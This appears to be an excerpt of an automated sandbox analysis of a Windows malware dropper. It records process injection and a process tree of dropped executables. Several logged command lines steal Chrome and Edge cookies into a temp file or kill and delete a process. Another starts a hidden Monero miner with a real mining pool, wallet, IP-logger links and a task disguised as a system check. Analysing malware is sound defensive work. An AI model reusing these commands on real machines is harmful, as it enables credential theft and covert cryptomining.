Token: SeDebugPrivilege	296	hqhJ93v2Sp2le8a1_PJ6h24Z.exe
Token: SeDebugPrivilege	4228	cmd.exe
Token: SeRestorePrivilege	8	WerFault.exe
Token: SeBackupPrivilege	8	WerFault.exe
Token: SeDebugPrivilege	8	WerFault.exe
Token: SeDebugPrivilege	4340	RAGsMRiGvQfHKGxdA_XdEHZ4.exe
Token: SeDebugPrivilege	4708	WerFault.exe
Token: SeDebugPrivilege	4912	DBquM9Ux3O2P6QTSM7bEyIJg.exe
Token: SeDebugPrivilege	652	0ZvtfMMtmei_r2LUhzD6s3nl.exe
Token: SeDebugPrivilege	1964	xuPTrPhG8LiTCCYkRU3l5dJn.exe
Token: SeDebugPrivilege	1028	TjiAcqevqaAuG8f2vw40KD72.exe
Token: SeDebugPrivilege	3136	gd6uGJvHfRYMrGagBQn0wl2K.exe
Token: SeDebugPrivilege	580	PegYFqmYOCQQpBeo47YBAEF5.exe
Token: SeDebugPrivilege	4672	2305080.exe
Token: SeDebugPrivilege	304	WerFault.exe
Token: SeDebugPrivilege	3756	2732743.exe
Token: SeDebugPrivilege	4392	WerFault.exe

Suspicious use of FindShellTrayWindow 1 IoCs

Processes:

Eug40X9J7YAE5ZHuGHmAbQnS.tmp

pid process

4136 Eug40X9J7YAE5ZHuGHmAbQnS.tmp

pid	process
4136	Eug40X9J7YAE5ZHuGHmAbQnS.tmp

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

Setup (8).exe

description	pid	process	target process
PID 4448 wrote to memory of 420	4448	Setup (8).exe	xuPTrPhG8LiTCCYkRU3l5dJn.exe
PID 4448 wrote to memory of 420	4448	Setup (8).exe	xuPTrPhG8LiTCCYkRU3l5dJn.exe
PID 4448 wrote to memory of 420	4448	Setup (8).exe	xuPTrPhG8LiTCCYkRU3l5dJn.exe
PID 4448 wrote to memory of 512	4448	Setup (8).exe	tDNpWE8Ffr9I95g5rfOORzaj.exe
PID 4448 wrote to memory of 512	4448	Setup (8).exe	tDNpWE8Ffr9I95g5rfOORzaj.exe
PID 4448 wrote to memory of 512	4448	Setup (8).exe	tDNpWE8Ffr9I95g5rfOORzaj.exe
PID 4448 wrote to memory of 804	4448	Setup (8).exe	DBquM9Ux3O2P6QTSM7bEyIJg.exe
PID 4448 wrote to memory of 804	4448	Setup (8).exe	DBquM9Ux3O2P6QTSM7bEyIJg.exe
PID 4448 wrote to memory of 804	4448	Setup (8).exe	DBquM9Ux3O2P6QTSM7bEyIJg.exe
PID 4448 wrote to memory of 4340	4448	Setup (8).exe	RAGsMRiGvQfHKGxdA_XdEHZ4.exe
PID 4448 wrote to memory of 4340	4448	Setup (8).exe	RAGsMRiGvQfHKGxdA_XdEHZ4.exe
PID 4448 wrote to memory of 4340	4448	Setup (8).exe	RAGsMRiGvQfHKGxdA_XdEHZ4.exe
PID 4448 wrote to memory of 652	4448	Setup (8).exe	0ZvtfMMtmei_r2LUhzD6s3nl.exe
PID 4448 wrote to memory of 652	4448	Setup (8).exe	0ZvtfMMtmei_r2LUhzD6s3nl.exe
PID 4448 wrote to memory of 652	4448	Setup (8).exe	0ZvtfMMtmei_r2LUhzD6s3nl.exe
PID 4448 wrote to memory of 856	4448	Setup (8).exe	tdLynNSjWDwoYV_NtVV9prtL.exe
PID 4448 wrote to memory of 856	4448	Setup (8).exe	tdLynNSjWDwoYV_NtVV9prtL.exe
PID 4448 wrote to memory of 856	4448	Setup (8).exe	tdLynNSjWDwoYV_NtVV9prtL.exe
PID 4448 wrote to memory of 508	4448	Setup (8).exe	gjBZerm3X6OG0IODIHvioyga.exe
PID 4448 wrote to memory of 508	4448	Setup (8).exe	gjBZerm3X6OG0IODIHvioyga.exe
PID 4448 wrote to memory of 296	4448	Setup (8).exe	hqhJ93v2Sp2le8a1_PJ6h24Z.exe
PID 4448 wrote to memory of 296	4448	Setup (8).exe	hqhJ93v2Sp2le8a1_PJ6h24Z.exe
PID 4448 wrote to memory of 296	4448	Setup (8).exe	hqhJ93v2Sp2le8a1_PJ6h24Z.exe
PID 4448 wrote to memory of 4256	4448	Setup (8).exe	tFAiejrvGkLA09uKG9VYjzE9.exe
PID 4448 wrote to memory of 4256	4448	Setup (8).exe	tFAiejrvGkLA09uKG9VYjzE9.exe
PID 4448 wrote to memory of 4256	4448	Setup (8).exe	tFAiejrvGkLA09uKG9VYjzE9.exe
PID 4448 wrote to memory of 4296	4448	Setup (8).exe	3IjmjaZKIJmptGbbtw1_D26A.exe
PID 4448 wrote to memory of 4296	4448	Setup (8).exe	3IjmjaZKIJmptGbbtw1_D26A.exe
PID 4448 wrote to memory of 4228	4448	Setup (8).exe	KxuucbJ_95kucQ9ETFrE7iPJ.exe
PID 4448 wrote to memory of 4228	4448	Setup (8).exe	KxuucbJ_95kucQ9ETFrE7iPJ.exe
PID 4448 wrote to memory of 580	4448	Setup (8).exe	PegYFqmYOCQQpBeo47YBAEF5.exe
PID 4448 wrote to memory of 580	4448	Setup (8).exe	PegYFqmYOCQQpBeo47YBAEF5.exe
PID 4448 wrote to memory of 580	4448	Setup (8).exe	PegYFqmYOCQQpBeo47YBAEF5.exe
PID 4448 wrote to memory of 1028	4448	Setup (8).exe	TjiAcqevqaAuG8f2vw40KD72.exe
PID 4448 wrote to memory of 1028	4448	Setup (8).exe	TjiAcqevqaAuG8f2vw40KD72.exe
PID 4448 wrote to memory of 1028	4448	Setup (8).exe	TjiAcqevqaAuG8f2vw40KD72.exe
PID 4448 wrote to memory of 1904	4448	Setup (8).exe	4RzU7BiBxmLwffxRvpEDiZSm.exe
PID 4448 wrote to memory of 1904	4448	Setup (8).exe	4RzU7BiBxmLwffxRvpEDiZSm.exe
PID 4448 wrote to memory of 1904	4448	Setup (8).exe	4RzU7BiBxmLwffxRvpEDiZSm.exe
PID 4448 wrote to memory of 1812	4448	Setup (8).exe	AK8bFJ2kMHwvSgaE68geOqWe.exe
PID 4448 wrote to memory of 1812	4448	Setup (8).exe	AK8bFJ2kMHwvSgaE68geOqWe.exe
PID 4448 wrote to memory of 1812	4448	Setup (8).exe	AK8bFJ2kMHwvSgaE68geOqWe.exe
PID 4448 wrote to memory of 2200	4448	Setup (8).exe	ch4sEc_fJpwjttkGs9QqTu4a.exe
PID 4448 wrote to memory of 2200	4448	Setup (8).exe	ch4sEc_fJpwjttkGs9QqTu4a.exe
PID 4448 wrote to memory of 2200	4448	Setup (8).exe	ch4sEc_fJpwjttkGs9QqTu4a.exe
PID 4448 wrote to memory of 2732	4448	Setup (8).exe	7XRd6tmNRnvpvvsD9uVr8_2e.exe
PID 4448 wrote to memory of 2732	4448	Setup (8).exe	7XRd6tmNRnvpvvsD9uVr8_2e.exe
PID 4448 wrote to memory of 2732	4448	Setup (8).exe	7XRd6tmNRnvpvvsD9uVr8_2e.exe
PID 4448 wrote to memory of 4416	4448	Setup (8).exe	XeZ3UVKJj0F8nD1ajWBiOWIQ.exe
PID 4448 wrote to memory of 4416	4448	Setup (8).exe	XeZ3UVKJj0F8nD1ajWBiOWIQ.exe
PID 4448 wrote to memory of 4416	4448	Setup (8).exe	XeZ3UVKJj0F8nD1ajWBiOWIQ.exe
PID 4448 wrote to memory of 4420	4448	Setup (8).exe	RP11pnadhhUPl610oidJj8MQ.exe
PID 4448 wrote to memory of 4420	4448	Setup (8).exe	RP11pnadhhUPl610oidJj8MQ.exe
PID 4448 wrote to memory of 4420	4448	Setup (8).exe	RP11pnadhhUPl610oidJj8MQ.exe
PID 4448 wrote to memory of 744	4448	Setup (8).exe	Dz6v9cEoKfJYRw032bIvHe6r.exe
PID 4448 wrote to memory of 744	4448	Setup (8).exe	Dz6v9cEoKfJYRw032bIvHe6r.exe
PID 4448 wrote to memory of 744	4448	Setup (8).exe	Dz6v9cEoKfJYRw032bIvHe6r.exe
PID 4448 wrote to memory of 3136	4448	Setup (8).exe	gd6uGJvHfRYMrGagBQn0wl2K.exe
PID 4448 wrote to memory of 3136	4448	Setup (8).exe	gd6uGJvHfRYMrGagBQn0wl2K.exe
PID 4448 wrote to memory of 3136	4448	Setup (8).exe	gd6uGJvHfRYMrGagBQn0wl2K.exe
PID 4448 wrote to memory of 3860	4448	Setup (8).exe	VO49JLlC8_Np40dUNpo8MwXg.exe
PID 4448 wrote to memory of 3860	4448	Setup (8).exe	VO49JLlC8_Np40dUNpo8MwXg.exe
PID 4448 wrote to memory of 3860	4448	Setup (8).exe	VO49JLlC8_Np40dUNpo8MwXg.exe
PID 4448 wrote to memory of 972	4448	Setup (8).exe	AOrVfqejFU4lQIMMYFfynLWS.exe

C:\Users\Admin\AppData\Local\Temp\Setup (8).exe
"C:\Users\Admin\AppData\Local\Temp\Setup (8).exe"
1⤵
- Checks computer location settings
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4448

C:\Users\Admin\Documents\TjiAcqevqaAuG8f2vw40KD72.exe
"C:\Users\Admin\Documents\TjiAcqevqaAuG8f2vw40KD72.exe"
2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
PID:1028

C:\Users\Admin\Documents\hqhJ93v2Sp2le8a1_PJ6h24Z.exe
"C:\Users\Admin\Documents\hqhJ93v2Sp2le8a1_PJ6h24Z.exe"
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:296

C:\Users\Admin\Documents\hqhJ93v2Sp2le8a1_PJ6h24Z.exe
"C:\Users\Admin\Documents\hqhJ93v2Sp2le8a1_PJ6h24Z.exe"
3⤵
PID:5240

C:\Users\Admin\Documents\tdLynNSjWDwoYV_NtVV9prtL.exe
"C:\Users\Admin\Documents\tdLynNSjWDwoYV_NtVV9prtL.exe"
2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:856

C:\Users\Admin\Documents\tdLynNSjWDwoYV_NtVV9prtL.exe
"C:\Users\Admin\Documents\tdLynNSjWDwoYV_NtVV9prtL.exe"
3⤵
- Executes dropped EXE
PID:2616

C:\Users\Admin\Documents\DBquM9Ux3O2P6QTSM7bEyIJg.exe
"C:\Users\Admin\Documents\DBquM9Ux3O2P6QTSM7bEyIJg.exe"
2⤵
- Executes dropped EXE
PID:804

C:\Users\Admin\Documents\DBquM9Ux3O2P6QTSM7bEyIJg.exe
C:\Users\Admin\Documents\DBquM9Ux3O2P6QTSM7bEyIJg.exe
3⤵
- Executes dropped EXE
PID:3192

C:\Users\Admin\Documents\DBquM9Ux3O2P6QTSM7bEyIJg.exe
C:\Users\Admin\Documents\DBquM9Ux3O2P6QTSM7bEyIJg.exe
3⤵
PID:3912

C:\Users\Admin\Documents\DBquM9Ux3O2P6QTSM7bEyIJg.exe
C:\Users\Admin\Documents\DBquM9Ux3O2P6QTSM7bEyIJg.exe
3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4912

C:\Users\Admin\Documents\RAGsMRiGvQfHKGxdA_XdEHZ4.exe
"C:\Users\Admin\Documents\RAGsMRiGvQfHKGxdA_XdEHZ4.exe"
2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
PID:4340

C:\Users\Admin\Documents\0ZvtfMMtmei_r2LUhzD6s3nl.exe
"C:\Users\Admin\Documents\0ZvtfMMtmei_r2LUhzD6s3nl.exe"
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:652

C:\Users\Admin\Documents\PegYFqmYOCQQpBeo47YBAEF5.exe
"C:\Users\Admin\Documents\PegYFqmYOCQQpBeo47YBAEF5.exe"
2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
PID:580

C:\Users\Admin\Documents\gjBZerm3X6OG0IODIHvioyga.exe
"C:\Users\Admin\Documents\gjBZerm3X6OG0IODIHvioyga.exe"
2⤵
- Executes dropped EXE
PID:508

C:\Users\Admin\Documents\tDNpWE8Ffr9I95g5rfOORzaj.exe
"C:\Users\Admin\Documents\tDNpWE8Ffr9I95g5rfOORzaj.exe"
2⤵
- Executes dropped EXE
PID:512

C:\Users\Admin\Documents\xuPTrPhG8LiTCCYkRU3l5dJn.exe
"C:\Users\Admin\Documents\xuPTrPhG8LiTCCYkRU3l5dJn.exe"
2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:420

C:\Users\Admin\Documents\xuPTrPhG8LiTCCYkRU3l5dJn.exe
C:\Users\Admin\Documents\xuPTrPhG8LiTCCYkRU3l5dJn.exe
3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1964

C:\Users\Admin\Documents\3IjmjaZKIJmptGbbtw1_D26A.exe
"C:\Users\Admin\Documents\3IjmjaZKIJmptGbbtw1_D26A.exe"
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:4296

C:\Users\Admin\Documents\tFAiejrvGkLA09uKG9VYjzE9.exe
"C:\Users\Admin\Documents\tFAiejrvGkLA09uKG9VYjzE9.exe"
2⤵
- Executes dropped EXE
PID:4256

C:\Users\Admin\Documents\KxuucbJ_95kucQ9ETFrE7iPJ.exe
"C:\Users\Admin\Documents\KxuucbJ_95kucQ9ETFrE7iPJ.exe"
2⤵
- Executes dropped EXE
PID:4228

C:\Users\Admin\AppData\Roaming\2305080.exe
"C:\Users\Admin\AppData\Roaming\2305080.exe"
3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4672

C:\Users\Admin\AppData\Roaming\3814353.exe
"C:\Users\Admin\AppData\Roaming\3814353.exe"
3⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetThreadContext
PID:804

C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
4⤵
- Executes dropped EXE
PID:1128

C:\Users\Admin\AppData\Roaming\7330230.exe
"C:\Users\Admin\AppData\Roaming\7330230.exe"
3⤵
- Executes dropped EXE
PID:4040

C:\Users\Admin\AppData\Roaming\2732743.exe
"C:\Users\Admin\AppData\Roaming\2732743.exe"
3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3756

C:\Users\Admin\Documents\AK8bFJ2kMHwvSgaE68geOqWe.exe
"C:\Users\Admin\Documents\AK8bFJ2kMHwvSgaE68geOqWe.exe"
2⤵
- Executes dropped EXE
PID:1812

C:\Users\Admin\Documents\AK8bFJ2kMHwvSgaE68geOqWe.exe
"C:\Users\Admin\Documents\AK8bFJ2kMHwvSgaE68geOqWe.exe" -q
3⤵
- Executes dropped EXE
PID:3152

C:\Users\Admin\Documents\4RzU7BiBxmLwffxRvpEDiZSm.exe
"C:\Users\Admin\Documents\4RzU7BiBxmLwffxRvpEDiZSm.exe"
2⤵
- Executes dropped EXE
PID:1904

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1904 -s 760
3⤵
- Program crash
PID:5548

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1904 -s 812
3⤵
- Program crash
PID:5840

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1904 -s 792
3⤵
- Program crash
PID:5972

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1904 -s 828
3⤵
- Program crash
PID:1300

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1904 -s 952
3⤵
- Program crash
PID:5404

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1904 -s 984
3⤵
- Program crash
PID:5552

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1904 -s 1092
3⤵
- Program crash
PID:3124

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1904 -s 1360
3⤵
- Program crash
PID:5704

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1904 -s 1328
3⤵
- Program crash
PID:5704

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1904 -s 1484
3⤵
- Program crash
PID:6812

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1904 -s 1572
3⤵
- Program crash
PID:6492

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1904 -s 900
3⤵
- Program crash
PID:7328

C:\Users\Admin\Documents\7XRd6tmNRnvpvvsD9uVr8_2e.exe
"C:\Users\Admin\Documents\7XRd6tmNRnvpvvsD9uVr8_2e.exe"
2⤵
- Executes dropped EXE
PID:2732

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2732 -s 388
3⤵
- Program crash
PID:5784

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2732 -s 424
3⤵
- Program crash
PID:5964

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2732 -s 480
3⤵
- Program crash
PID:5156

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2732 -s 620
3⤵
- Program crash
PID:4332

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2732 -s 660
3⤵
- Program crash
PID:3312

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2732 -s 696
3⤵
- Program crash
PID:5572

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2732 -s 588
3⤵
- Program crash
PID:6596

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2732 -s 708
3⤵
- Program crash
PID:6152

C:\Users\Admin\Documents\7XRd6tmNRnvpvvsD9uVr8_2e.exe
"C:\Users\Admin\Documents\7XRd6tmNRnvpvvsD9uVr8_2e.exe"
3⤵
PID:10912

C:\Users\Admin\Documents\ch4sEc_fJpwjttkGs9QqTu4a.exe
"C:\Users\Admin\Documents\ch4sEc_fJpwjttkGs9QqTu4a.exe"
2⤵
- Executes dropped EXE
PID:2200

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\6743681585.exe"
3⤵
PID:6104

C:\Users\Admin\AppData\Local\Temp\6743681585.exe
"C:\Users\Admin\AppData\Local\Temp\6743681585.exe"
4⤵
PID:5972

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\8690626576.exe"
3⤵
PID:7412

C:\Users\Admin\AppData\Local\Temp\8690626576.exe
"C:\Users\Admin\AppData\Local\Temp\8690626576.exe"
4⤵
PID:8080

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 8080 -s 756
5⤵
- Program crash
PID:8288

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 8080 -s 764
5⤵
- Program crash
PID:8632

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 8080 -s 768
5⤵
- Program crash
PID:8824

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 8080 -s 892
5⤵
- Program crash
PID:6864

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im "ch4sEc_fJpwjttkGs9QqTu4a.exe" /f & erase "C:\Users\Admin\Documents\ch4sEc_fJpwjttkGs9QqTu4a.exe" & exit
3⤵
PID:7780

C:\Windows\SysWOW64\taskkill.exe
taskkill /im "ch4sEc_fJpwjttkGs9QqTu4a.exe" /f
4⤵
- Executes dropped EXE
- Kills process with taskkill
PID:3836

C:\Users\Admin\Documents\Dz6v9cEoKfJYRw032bIvHe6r.exe
"C:\Users\Admin\Documents\Dz6v9cEoKfJYRw032bIvHe6r.exe"
2⤵
- Executes dropped EXE
PID:744

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im "Dz6v9cEoKfJYRw032bIvHe6r.exe" /f & erase "C:\Users\Admin\Documents\Dz6v9cEoKfJYRw032bIvHe6r.exe" & exit
3⤵
PID:5512

C:\Windows\SysWOW64\taskkill.exe
taskkill /im "Dz6v9cEoKfJYRw032bIvHe6r.exe" /f
4⤵
- Kills process with taskkill
PID:5432

C:\Users\Admin\Documents\RP11pnadhhUPl610oidJj8MQ.exe
"C:\Users\Admin\Documents\RP11pnadhhUPl610oidJj8MQ.exe"
2⤵
- Executes dropped EXE
- Drops file in Program Files directory
PID:4420

C:\Program Files (x86)\Company\NewProduct\customer3.exe
"C:\Program Files (x86)\Company\NewProduct\customer3.exe"
3⤵
PID:3836

C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
4⤵
PID:5572

C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /DeleteCookiesWildcard "*.facebook.com"
4⤵
PID:6192

C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
4⤵
PID:6988

C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /DeleteCookiesWildcard "*.facebook.com"
4⤵
PID:7144

C:\Users\Admin\AppData\Local\Temp\22222.exe
C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
4⤵
PID:6292

C:\Users\Admin\AppData\Local\Temp\22222.exe
C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /DeleteCookiesWildcard "*.facebook.com"
4⤵
PID:6548

C:\Users\Admin\AppData\Local\Temp\22222.exe
C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
4⤵
PID:7248

C:\Users\Admin\AppData\Local\Temp\22222.exe
C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /DeleteCookiesWildcard "*.facebook.com"
4⤵
PID:7608

C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
"C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"
3⤵
PID:4584

C:\Program Files (x86)\Company\NewProduct\jooyu.exe
"C:\Program Files (x86)\Company\NewProduct\jooyu.exe"
3⤵
- Executes dropped EXE
PID:3752

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
4⤵
PID:4164

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
4⤵
PID:1424

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
4⤵
PID:7692

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
4⤵
PID:10408

C:\Users\Admin\Documents\XeZ3UVKJj0F8nD1ajWBiOWIQ.exe
"C:\Users\Admin\Documents\XeZ3UVKJj0F8nD1ajWBiOWIQ.exe"
2⤵
- Executes dropped EXE
PID:4416

C:\Users\Admin\Documents\VO49JLlC8_Np40dUNpo8MwXg.exe
"C:\Users\Admin\Documents\VO49JLlC8_Np40dUNpo8MwXg.exe"
2⤵
- Executes dropped EXE
PID:3860

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3860 -s 660
3⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:8

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3860 -s 676
3⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4708

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3860 -s 712
3⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:304

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3860 -s 644
3⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4392

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3860 -s 1076
3⤵
- Program crash
PID:6020

C:\Users\Admin\Documents\gd6uGJvHfRYMrGagBQn0wl2K.exe
"C:\Users\Admin\Documents\gd6uGJvHfRYMrGagBQn0wl2K.exe"
2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
PID:3136

C:\Users\Admin\Documents\Eug40X9J7YAE5ZHuGHmAbQnS.exe
"C:\Users\Admin\Documents\Eug40X9J7YAE5ZHuGHmAbQnS.exe"
2⤵
- Executes dropped EXE
PID:3796

C:\Users\Admin\AppData\Local\Temp\is-DE0VM.tmp\Eug40X9J7YAE5ZHuGHmAbQnS.tmp
"C:\Users\Admin\AppData\Local\Temp\is-DE0VM.tmp\Eug40X9J7YAE5ZHuGHmAbQnS.tmp" /SL5="$3014A,138429,56832,C:\Users\Admin\Documents\Eug40X9J7YAE5ZHuGHmAbQnS.exe"
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
PID:4136

C:\Users\Admin\AppData\Local\Temp\is-BJ10D.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-BJ10D.tmp\Setup.exe" /Verysilent
4⤵
PID:6124

C:\Program Files (x86)\GameBox INC\GameBox\Stats.exe
"C:\Program Files (x86)\GameBox INC\GameBox\Stats.exe" /Verysilent
5⤵
PID:5340

C:\Users\Admin\AppData\Local\Temp\is-6MOF2.tmp\Stats.tmp
"C:\Users\Admin\AppData\Local\Temp\is-6MOF2.tmp\Stats.tmp" /SL5="$202EE,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\Stats.exe" /Verysilent
6⤵
PID:5620

C:\Users\Admin\AppData\Local\Temp\is-33AUJ.tmp\builder.exe
"C:\Users\Admin\AppData\Local\Temp\is-33AUJ.tmp\builder.exe" -algo'' -pool'stratum+tcp://xmr-asia1.nanopool.org:14444' -wallet'42Lm2CeGer8hubckgimBBXhKWRnZqtLx74Ye2HcyMyikARReDxWRn15Bia1k8qgnboPNxEZJHN5HgX8eNa1EP7xeA3X8Z7s' -load'50' -idleload'50' -loggerSa'2no.co' -loggerS'1C6Ua7' -loggerRa'iplogger.org' -loggerR'1cmAy7' -loggerWa'2no.co' -loggerW'' -ico'' -glue'' -error'' -worker'' -icrypt'' -sremoval'' -ntask'SystemCheck' -ptask'System\' -atask'Microsoft_Corporation' -dtask'Starts_a_system_diagnostics_application_to_scan_for_errors_and_performance_problems.' -pinstall'Roaming\Microsoft\Windows\' -ninstall'Helper' -sinstall'-SystemCheck'
7⤵
PID:4148

C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe
"C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe" /Verysilent
5⤵
PID:5460

C:\Users\Admin\AppData\Local\Temp\is-8K9NM.tmp\Inlog.tmp
"C:\Users\Admin\AppData\Local\Temp\is-8K9NM.tmp\Inlog.tmp" /SL5="$20282,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe" /Verysilent
6⤵
PID:4984

C:\Users\Admin\AppData\Local\Temp\is-J7NJ2.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-J7NJ2.tmp\Setup.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 721
7⤵
PID:6900

C:\Users\Admin\AppData\Local\Temp\is-E09QL.tmp\Setup.tmp
